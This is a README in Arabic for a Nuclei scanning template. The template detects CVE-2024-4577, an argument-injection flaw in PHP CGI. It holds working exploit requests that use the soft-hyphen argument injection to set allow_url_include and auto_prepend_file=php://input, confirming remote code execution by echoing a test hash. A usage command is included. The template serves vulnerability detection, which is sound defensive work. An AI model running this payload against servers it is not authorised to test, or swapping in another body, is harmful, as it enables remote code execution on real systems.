
قالب Nuclei لكشف ثغرة حقن المعاملات في PHP CGI (CVE-2024-4577)، مما يتيح اختبار تنفيذ الأكواد عن بُعد (RCE) تلقائيًا عبر طلبات HTTP مصممة خصيصًا ومطابقة الاستجابات.
يحتوي هذا المستودع على قالب Nuclei لاستكشاف ثغرة حقن الوسائط في PHP CGI المعروفة باسم CVE-2024-4577.
id: CVE-2024-4577
info:
name: CVE-2024-4577 PHP CGI Argument Injection
author: Hüseyin TINTAŞ
severity: critical
description: >
CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
tags: cve,cve2024,php,cgi,rce,cve2024-4577
http:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
headers:
User-Agent: "curl/8.3.0"
Accept: "*/*"
Content-Type: "application/x-www-form-urlencoded"
Connection: "keep-alive"
body: |
<?php echo md5("CVE_2024_4577_TEST"); ?>
matchers:
- type: word
part: body
words:
- "83946a388fdf6cd2707eed8550575a76"
لاستخدام هذا القالب مع Nuclei، احفظ محتوى القالب في ملف باسم CVE-2024-4577.yaml ثم نفّذ الأمر التالي:
nuclei -t CVE-2024-4577.yaml -u <target-url>
استبدل <target-url> بعنوان URL الخاص بالهدف الذي تريد فحصه.
للاستفسارات أو لمزيد من المعلومات، يمكنك التواصل معي عبر: